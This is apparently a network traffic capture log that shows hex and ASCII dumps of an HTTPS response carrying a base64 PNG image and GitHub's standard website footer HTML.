                                                                                                                                  Data Ascii: I+iIgA1+1CtiaaVwE4sPUzKIUJi3DgSkV0I3A9sFSRFg+uD9R4I9yDnGSEaEgwcTMKMM++mzz6OTIswoiX9VWBxfXc1bwksj5ZnPFKXdsQddbKrDioxEDk+irdxhFqCzNDizAwEUFVfZ9DQEG/oTlIyxUW/2HSytcWVywInjLgfNkdAIUrKQjAGGGXEYS3NwoShJLQKvIsTZ6XkRXsUGGsXrCDiRVv1Wvf4dzhzkI34fciohqJrkiqKjQfqyrmI
                                                                                                                                  2022-10-17 20:07:12 UTC619INData Raw: 70 41 46 32 61 50 55 6d 46 46 66 30 67 59 62 71 36 52 52 67 4f 62 4c 35 44 66 55 43 6a 61 71 68 30 79 68 68 6a 6e 74 6c 61 4f 43 50 6d 71 57 62 52 72 41 6e 31 72 4a 72 59 73 43 4c 77 5a 36 6e 34 68 72 65 6f 41 4d 59 7a 37 66 49 30 4c 6f 6a 58 41 42 32 47 67 46 32 6e 32 64 6e 58 6b 72 4a 62 46 41 38 74 45 4b 76 61 72 61 39 44 39 2f 57 48 32 66 6d 39 59 35 42 69 69 79 44 7a 66 5a 47 5a 67 78 64 42 48 46 56 6f 70 73 35 41 47 51 4a 32 56 54 54 34 42 68 45 71 49 69 32 56 63 35 64 4d 46 73 42 52 4e 41 47 6d 70 44 76 57 7a 36 72 36 74 63 64 72 4f 77 64 54 46 4b 48 49 67 4e 33 57 62 66 52 6f 38 53 6c 35 32 50 72 33 6f 34 4a 4d 61 55 65 38 43 63 45 54 46 4d 65 77 6f 31 57 46 48 45 76 69 53 6c 70 41 62 48 74 73 53 36 73 39 58 5a 64 4f 66 6f 77 5a 62 6b 48 66 48 56
                                                                                                                                  Data Ascii: pAF2aPUmFFf0gYbq6RRgObL5DfUCjaqh0yhhjntlaOCPmqWbRrAn1rJrYsCLwZ6n4hreoAMYz7fI0LojXAB2GgF2n2dnXkrJbFA8tEKvara9D9/WH2fm9Y5BiiyDzfZGZgxdBHFVops5AGQJ2VTT4BhEqIi2Vc5dMFsBRNAGmpDvWz6r6tcdrOwdTFKHIgN3WbfRo8Sl52Pr3o4JMaUe8CcETFMewo1WFHEviSlpAbHtsS6s9XZdOfowZbkHfHV
                                                                                                                                  2022-10-17 20:07:12 UTC620INData Raw: 4a 61 32 67 6e 52 63 50 6f 74 6b 43 41 61 67 62 61 57 48 33 53 4f 47 41 72 51 43 35 55 47 64 76 47 45 6f 6c 6f 35 6b 4d 2f 5a 52 64 6a 6e 72 48 62 62 55 7a 43 47 4c 6c 59 6f 59 73 5a 77 2f 4a 34 37 78 73 48 65 71 7a 4f 74 33 56 6b 71 69 36 49 34 73 39 54 55 39 38 66 57 32 67 4d 4d 47 77 5a 45 63 6e 70 4f 33 4c 4b 57 63 6e 49 4c 59 62 35 48 4b 61 6d 68 71 65 78 2b 2b 63 78 46 55 48 6b 46 5a 6b 4d 72 41 5a 63 66 6b 54 55 35 42 47 6f 4c 36 6b 46 72 41 44 50 6f 2b 52 74 30 62 63 50 78 2b 35 45 4b 62 4a 57 52 37 74 32 37 2b 37 71 36 76 70 71 2f 2f 36 44 6c 36 66 47 76 70 2f 64 78 4d 6d 2b 6d 35 79 63 57 6c 74 62 57 31 39 66 50 37 2b 79 38 71 62 63 65 43 37 35 53 44 7a 63 61 4a 64 4b 46 45 66 66 76 53 6a 45 59 6c 38 77 6a 43 53 4d 79 6a 34 6a 51 6d 6f 75 6e 5a
                                                                                                                                  Data Ascii: Ja2gnRcPotkCAagbaWH3SOGArQC5UGdvGEolo5kM/ZRdjnrHbbUzCGLlYoYsZw/J47xsHeqzOt3Vkqi6I4s9TU98fW2gMMGwZEcnpO3LKWcnILYb5HKamhqex++cxFUHkFZkMrAZcfkTU5BGoL6kFrADPo+Rt0bcPx+5EKbJWR7t27+7q6vpq//6Dl6fGvp/dxMm+m5ycWltbW19fP7+y8qbceC75SDzcaJdKFEffvSjEYl8wjCSMyj4jQmounZ
                                                                                                                                  2022-10-17 20:07:12 UTC622INData Raw: 45 55 67 41 41 41 48 51 41 41 41 41 79 43 41 4d 41 41 41 43 36 52 51 39 6b 41 41 41 41 41 33 4e 43 53 56 51 49 43 41 6a 62 34 55 2f 67 41 41 41 42 67 46 42 4d 56 45 58 2f 2f 2f 2f 6b 79 5a 6d 31 70 49 44 65 78 70 72 37 33 71 71 6e 6d 6e 61 6c 6c 6e 47 6e 6d 6e 6e 33 33 61 71 6a 6c 58 6e 31 32 61 6e 73 7a 70 69 37 70 34 50 55 76 5a 50 75 31 61 58 50 75 6f 36 74 6d 33 7a 72 30 61 4c 66 78 5a 62 4e 74 34 78 78 62 57 4f 55 69 6d 36 79 6e 33 6c 37 63 32 4e 73 61 46 32 2b 72 49 53 74 6d 33 79 6f 6d 34 43 32 6f 33 76 32 32 4b 53 7a 6e 57 2b 72 6e 49 47 65 6a 47 75 71 6c 6d 33 5a 78 4a 5a 78 62 57 4e 30 62 46 76 55 76 5a 50 76 30 4a 76 6e 7a 5a 32 4d 66 6d 50 41 72 59 71 37 70 34 50 58 76 6f 37 51 75 35 4c 46 73 6f 71 2b 72 49 52 73 61 57 44 78 30 35 37 45 72 59
                                                                                                                                  Data Ascii: EUgAAAHQAAAAyCAMAAAC6RQ9kAAAAA3NCSVQICAjb4U/gAAABgFBMVEX////kyZm1pIDexpr73qqnmnallnGnmnn33aqjlXn12anszpi7p4PUvZPu1aXPuo6tm3zr0aLfxZbNt4xxbWOUim6yn3l7c2NsaF2+rIStm3yom4C2o3v22KSznW+rnIGejGuqlm3ZxJZxbWN0bFvUvZPv0JvnzZ2MfmPArYq7p4PXvo7Qu5LFsoq+rIRsaWDx057ErY
                                                                                                                                  2022-10-17 20:07:12 UTC623INData Raw: 38 6f 49 51 62 45 33 54 31 45 52 55 6b 69 45 77 45 6e 67 6a 49 4f 73 64 72 76 64 67 72 51 78 2b 79 7a 48 74 36 63 35 78 75 69 6c 33 77 6c 62 67 42 4a 47 45 47 59 30 47 6b 38 34 68 50 34 6b 2b 69 64 68 2b 50 78 6e 50 6e 57 6b 47 49 75 48 32 74 47 30 41 49 76 51 57 41 73 58 52 71 46 52 69 79 2b 4f 78 6b 79 45 32 6f 47 6c 79 64 2b 77 50 50 31 49 66 65 45 36 77 53 65 68 39 42 2f 6e 6d 4b 42 35 73 5a 6a 4a 5a 6a 4e 65 44 47 75 68 36 6c 50 55 6b 36 42 54 46 69 56 64 49 71 57 46 57 71 52 30 61 76 73 5a 5a 32 67 31 6d 36 46 58 44 4c 52 59 6f 51 75 5a 7a 45 51 53 56 45 53 73 61 55 2f 6d 69 37 4a 79 45 65 70 54 77 45 30 2b 56 52 42 61 61 59 46 47 7a 6d 59 6e 59 71 43 79 68 6b 75 31 31 50 55 45 39 7a 72 76 47 4a 33 57 52 45 4b 47 36 48 46 4b 32 54 56 46 56 79 61 64
                                                                                                                                  Data Ascii: 8oIQbE3T1ERUkiEwEngjIOsdrvdgrQx+yzHt6c5xuil3wlbgBJGEGY0Gk84hP4k+idh+PxnPnWkGIuH2tG0AIvQWAsXRqFRiy+OxkyE2oGlyd+wPP1IfeE6wSeh9B/nmKB5sZjJZjNeDGuh6lPUk6BTFiVdIqWFWqR0avsZZ2g1m6FXDLRYoQuZzEQSVESsaU/mi7JyEepTwE0+VRBaaYFGzmYnYqCyhku11PUE9zrvGJ3WREKG6HFK2TVFVyad
                                                                                                                                  2022-10-17 20:07:12 UTC624INData Raw: 76 4f 35 2b 30 59 6a 74 6a 55 6c 7a 35 36 4d 4f 50 58 36 42 34 2f 2f 4e 53 6f 2f 48 64 6e 54 76 66 39 7a 59 33 4e 33 75 39 2f 66 58 31 39 58 76 33 37 6b 39 69 36 4a 58 4a 2b 7a 4d 63 46 36 59 35 66 75 78 30 31 74 59 36 61 35 31 57 71 7a 58 57 63 72 53 2f 41 47 53 68 6a 35 6e 6f 47 72 5a 4d 41 41 41 41 41 45 6c 46 54 6b 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 2d 6c 67 20 6d 74 2d 35 20 70 78 2d 33 22 3e 0a 20 20 3c 21 2d 2d 20 27 22 60 20 2d 2d 3e 3c 21 2d 2d 20 3c 2f 74 65 78 74 61 72 65 61 3e 3c 2f 78 6d 70 3e 20 2d 2d 3e 3c 2f 6f 70 74 69 6f 6e 3e 3c 2f 66 6f 72 6d 3e 3c 66 6f 72 6d 20 72 6f 6c 65 3d 22 73 65 61 72 63 68 22 20 64 61 74 61 2d
                                                                                                                                  Data Ascii: vO5+0YjtjUlz56MOPX6B4//NSo/HdnTvf9zY3N3u9/fX19Xv37k9i6JXJ+zMcF6Y5fux01tY6a51WqzXWcrS/AGShj5noGrZMAAAAAElFTkSuQmCC"> </div> </div><div class="container-lg mt-5 px-3"> ... '"` -->... </textarea></xmp> --></option></form><form role="search" data-
                                                                                                                                  2022-10-17 20:07:12 UTC626INData Raw: 72 65 66 3d 22 2f 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 46 6f 6f 74 65 72 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 67 6f 20 74 6f 20 68 6f 6d 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 74 65 78 74 3a 68 6f 6d 65 26 71 75 6f 74 3b 7d 22 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 64 65 66 61 75 6c 74 20 64 2d 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 6f 20 74 6f 20 47 69 74 48 75 62 20 68 6f 6d 65 70 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 73 76 67 20 68 65 69 67 68 74 3d 22 33
                                                                                                                                  Data Ascii: ref="/" data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to home&quot;,&quot;label&quot;:&quot;text:home&quot;}" class="color-fg-default d-inline-block" aria-label="Go to GitHub homepage"> <svg height="3
                                                                                                                                  2022-10-17 20:07:12 UTC627INData Raw: 30 20 32 2e 35 32 2d 2e 37 37 20 32 2e 35 32 2d 2e 37 37 73 2e 30 35 2e 33 39 2e 30 38 2e 34 35 63 2e 30 32 2e 30 35 2e 30 39 2e 30 39 2e 31 36 2e 30 39 68 31 2e 33 34 63 2e 31 31 20 30 20 2e 31 37 2d 2e 30 38 2e 31 37 2d 2e 31 37 6c 2e 30 32 2d 37 2e 34 37 63 30 2d 2e 30 39 2d 2e 30 38 2d 2e 31 37 2d 2e 31 39 2d 2e 31 37 7a 6d 2d 32 33 2e 37 2d 2e 30 31 68 2d 32 2e 31 33 63 2d 2e 30 39 20 30 2d 2e 31 37 2e 30 39 2d 2e 31 37 2e 32 76 37 2e 33 34 63 30 20 2e 32 2e 31 33 2e 32 37 2e 33 2e 32 37 68 31 2e 39 32 63 2e 32 20 30 20 2e 32 35 2d 2e 30 39 2e 32 35 2d 2e 32 37 56 36 2e 32 33 63 30 2d 2e 30 39 2d 2e 30 38 2d 2e 31 37 2d 2e 31 37 2d 2e 31 37 7a 6d 2d 31 2e 30 35 2d 33 2e 33 38 63 2d 2e 37 37 20 30 2d 31 2e 33 38 2e 36 31 2d 31 2e 33 38 20 31 2e 33 38
                                                                                                                                  Data Ascii: 0 2.52-.77 2.52-.77s.05.39.08.45c.02.05.09.09.16.09h1.34c.11 0 .17-.08.17-.17l.02-7.47c0-.09-.08-.17-.19-.17zm-23.7-.01h-2.13c-.09 0-.17.09-.17.2v7.34c0 .2.13.27.3.27h1.92c.2 0 .25-.09.25-.27V6.23c0-.09-.08-.17-.17-.17zm-1.05-3.38c-.77 0-1.38.61-1.38 1.38
                                                                                                                                  2022-10-17 20:07:12 UTC628INData Raw: 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 74 65 78 74 3a 66 65 61 74 75 72 65 73 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 66 65 61 74 75 72 65 73 22 3e 46 65 61 74 75 72 65 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 6d 62 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 46 6f 6f 74 65 72 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75
                                                                                                                                  Data Ascii: uot;,&quot;label&quot;:&quot;text:features&quot;}" href="/features">Features</a> </li> <li class="lh-condensed mb-3"> <a class="Link--secondary" data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&qu
                                                                                                                                  2022-10-17 20:07:12 UTC630INData Raw: 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 46 6f 6f 74 65 72 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 67 6f 20 74 6f 20 74 68 65 20 72 65 61 64 6d 65 20 70 72 6f 6a 65 63 74 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 74 65 78 74 3a 74 68 65 20 72 65 61 64 6d 65 20 70 72 6f 6a 65 63 74 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 72 65 61 64 6d 65 22 3e 54 68 65 20 52 65 61 64 4d 45 20 50 72 6f 6a 65 63 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 6d 62 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61
                                                                                                                                  Data Ascii: category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to the readme project&quot;,&quot;label&quot;:&quot;text:the readme project&quot;}" href="/readme">The ReadME Project</a> </li> <li class="lh-condensed mb-3"> <a
                                                                                                                                  2022-10-17 20:07:12 UTC631INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 46 6f 6f 74 65 72 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 67 6f 20 74 6f 20 61 70 69 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 74 65 78 74 3a 61 70 69 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 73 2e 67 69 74 68 75 62 2e 63 6f 6d 22 3e 44 65 76 65 6c 6f 70 65 72 20 41 50 49 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: <a class="Link--secondary" data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to api&quot;,&quot;label&quot;:&quot;text:api&quot;}" href="https://docs.github.com">Developer API</a> </li>
                                                                                                                                  2022-10-17 20:07:12 UTC632INData Raw: 69 73 74 2d 73 74 79 6c 65 2d 6e 6f 6e 65 20 66 35 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 6d 62 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 46 6f 6f 74 65 72 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 67 6f 20 74 6f 20 68 65 6c 70 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 74 65 78 74 3a 44 6f 63 73 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 68 74
                                                                                                                                  Data Ascii: ist-style-none f5"> <li class="lh-condensed mb-3"> <a class="Link--secondary" data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to help&quot;,&quot;label&quot;:&quot;text:Docs&quot;}" href="ht
                                                                                                                                  2022-10-17 20:07:12 UTC634INData Raw: 6f 6f 74 65 72 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 67 6f 20 74 6f 20 73 74 61 74 75 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 74 65 78 74 3a 73 74 61 74 75 73 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 2f 22 3e 53 74 61 74 75 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 6d 62 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 64 61 74 61 2d 61 6e 61 6c 79 74
                                                                                                                                  Data Ascii: ooter&quot;,&quot;action&quot;:&quot;go to status&quot;,&quot;label&quot;:&quot;text:status&quot;}" href="https://www.githubstatus.com/">Status</a> </li> <li class="lh-condensed mb-3"> <a class="Link--secondary" data-analyt
                                                                                                                                  2022-10-17 20:07:12 UTC635INData Raw: 64 61 72 79 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 46 6f 6f 74 65 72 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 67 6f 20 74 6f 20 63 61 72 65 65 72 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 74 65 78 74 3a 63 61 72 65 65 72 73 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 61 62 6f 75 74 2f 63 61 72 65 65 72 73 22 3e 43 61 72 65 65 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 6d 62 2d 33 22 3e 0a 20 20 20 20 20
                                                                                                                                  Data Ascii: dary" data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to careers&quot;,&quot;label&quot;:&quot;text:careers&quot;}" href="/about/careers">Careers</a> </li> <li class="lh-condensed mb-3">
                                                                                                                                  2022-10-17 20:07:12 UTC636INData Raw: 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 62 67 2d 73 75 62 74 6c 65 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 2d 78 6c 20 70 2d 72 65 73 70 6f 6e 73 69 76 65 20 66 36 20 70 79 2d 34 20 64 2d 73 6d 2d 66 6c 65 78 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 62 65 74 77 65 65 6e 20 66 6c 65 78 2d 72 6f 77 2d 72 65 76 65 72 73 65 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 73 74 79 6c 65 2d 6e 6f 6e 65 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 69 74 65 6d 73
                                                                                                                                  Data Ascii: </li> </ul> </div> </div> </div> <div class="color-bg-subtle"> <div class="container-xl p-responsive f6 py-4 d-sm-flex flex-justify-between flex-row-reverse flex-items-center"> <ul class="list-style-none d-flex flex-items
                                                                                                                                  2022-10-17 20:07:12 UTC638INData Raw: 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 72 2d 33 20 66 6c 65 78 2d 73 65 6c 66 2d 73 74 61 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 69 6e 6b 65 64 69 6e 2e 63 6f 6d 2f 63 6f 6d 70 61 6e 79 2f 67 69 74 68 75 62 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 46 6f 6f 74 65 72 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 67 6f 20 74 6f 20 4c 69 6e 6b 65 64 69 6e 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 74 65 78 74 3a 6c 69 6e 6b 65 64 69 6e 26 71 75 6f 74 3b 7d 22
                                                                                                                                  Data Ascii: <li class="mr-3 flex-self-start"> <a href="https://www.linkedin.com/company/github" data-analytics-event="{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to Linkedin&quot;,&quot;label&quot;:&quot;text:linkedin&quot;}"
                                                                                                                                  2022-10-17 20:07:12 UTC639INData Raw: 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 6d 6f 64 75 6c 65 73 2f 73 69 74 65 2f 69 63 6f 6e 73 2f 66 6f 6f 74 65 72 2f 74 77 69 74 63 68 2e 73 76 67 22 20 77 69 64 74 68 3d 22 31 38 22 20 68 65 69 67 68 74 3d 22 31 38 22 20 20 63 6c 61 73 73 3d 22 64 2d 62 6c 6f 63 6b 22 20 6c 6f 61 64 69 6e 67 3d 22 6c 61 7a 79 22 20 64 65 63 6f 64 69 6e 67 3d 22 61 73 79 6e 63 22 20 61 6c 74 3d 22 54 77 69 74 63 68 20 69 63 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 47 69 74 48 75 62 20 6f 6e 20 54 77 69 74 63 68 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e
                                                                                                                                  Data Ascii: "https://github.githubassets.com/images/modules/site/icons/footer/twitch.svg" width="18" height="18" class="d-block" loading="lazy" decoding="async" alt="Twitch icon"> <span class="sr-only">GitHub on Twitch</span> </a> </li>
                                                                                                                                  2022-10-17 20:07:12 UTC640INData Raw: 6e 6f 6e 65 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 77 72 61 70 20 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 72 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 26 63 6f 70 79 3b 20 32 30 32 32 20 47 69 74 48 75 62 2c 20 49 6e 63 2e 0a 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 72 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 73 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 65 6e 2f 67 69 74 68 75 62 2f 73 69 74 65 2d 70 6f 6c 69 63 79 2f 67 69 74 68 75 62 2d 74 65 72 6d 73 2d 6f 66 2d 73 65 72 76 69 63 65 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26
                                                                                                                                  Data Ascii: none d-flex flex-wrap color-fg-muted"> <li class="mr-3"> &copy; 2022 GitHub, Inc. </li> <li class="mr-3"> <a href="https://docs.github.com/en/github/site-policy/github-terms-of-service" data-analytics-event="{&
                                                                                                                                  2022-10-17 20:07:12 UTC642INData Raw: 61 3e 0a 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 66 6f 6f 74 65 72 3e 0a 0a 0a 0a 0a 20 20 3c 64 69 76 20 69 64 3d 22 61 6a 61 78 2d 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 22 20 63 6c 61 73 73 3d 22 61 6a 61 78 2d 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 66 6c 61 73 68 20 66 6c 61 73 68 2d 65 72 72 6f 72 22 20 68 69 64 64 65 6e 3e 0a 20 20 20 20 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72
                                                                                                                                  Data Ascii: a> </li> </ul> </div> </div></footer> <div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="tr
                                                                                                                                  2022-10-17 20:07:12 UTC643INData Raw: 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 61 6c 65 72 74 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 38 2e 32 32 20 31 2e 37 35 34 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 34 34 20 30 4c 31 2e 36 39 38 20 31 33 2e 31 33 32 61 2e 32 35 2e 32 35 20 30 20 30 30 2e 32 32 2e 33 36 38 68 31 32 2e 31 36 34 61 2e 32 35 2e 32 35 20 30 20 30 30 2e 32 32 2d 2e 33 36 38 4c 38 2e 32 32 20 31 2e 37 35 34 7a 6d 2d 31 2e 37 36 33 2d 2e 37 30 37 63 2e 36 35 39 2d 31 2e 32 33 34 20 32 2e 34 32 37 2d 31 2e 32 33 34 20 33 2e 30 38 36 20 30 6c 36 2e 30 38 32 20 31 31 2e 33 37 38 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 31 31 34 2e
